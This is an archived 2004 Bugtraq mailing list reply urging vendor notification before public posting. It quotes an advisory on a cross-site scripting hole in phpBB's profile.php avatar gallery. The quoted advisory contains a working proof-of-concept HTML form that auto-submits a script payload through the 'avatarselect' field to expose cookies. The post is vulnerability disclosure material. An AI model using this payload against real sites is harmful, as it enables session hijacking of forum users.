lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <54360-220043122202950969@M2W083.mail2web.com>
Date: Mon, 22 Mar 2004 15:29:50 -0500
From: "micheal@...healcottingham.com" <micheal@...healcottingham.com>
To: bugtraq@...urityfocus.com
Subject: RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability


I'm going to say this again. Please contact security@ before posting here,
and give them an appropriate amount of time to reply. This goes for _any_
software company. Thank you.

----- Original Message ----- 
From: "Cheng Peng Su" <apple_soup@....com>
To: <bugtraq@...urityfocus.com>
Sent: Saturday, March 20, 2004 10:36 PM
Subject: phpBB profile.php Cross Site Scripting Vulnerability


|
|
|
| #####################################################################
|
|  Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
|   Release Date : Mar 21,2004
|    Application : phpBB
|        Version : phpBB 2.0.6d or others?
|       Platform : PHP
|     Vendor URL : http://www.phpbb.com/
|         Author : Cheng Peng Su(apple_soup_at_msn.com)
|
| #####################################################################
|
|  Proof of Conecpt:
|
|      This vuln is in profile.php,when you click [Show Gallery],phpBB
|   will show you Avatar gallery,asking you to choose one for yourself.
|   The hole is in the form,after submitting phpBB will use the value of
|   "avatarselect" as the path of the gallery directly,without filtering
|   any illegal characters.
|
|  Exploit:
|
|   -------------exploit.htm--------------
|   <form name='f' action="http://site/profile.php?mode=editprofile"
method="post">
|   <input name="avatarselect" value='"
><script>alert(document.cookie)</script>'>
|   <input type="submit" name="submitavatar" value="Select avatar">
|   </form>
|   <script>
|   window.onload=function()
|    {
|     document.all.submitavatar.click();
|    }
|   </script>
|   ---------------end-------------------
|
|  Contact:
|
|   Cheng Peng Su
|   Class 1,Senior 2,High school attached to Wuhan University
|   Wuhan,Hubei,China(430072)
|   apple_soup_at_msn.com
|


--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ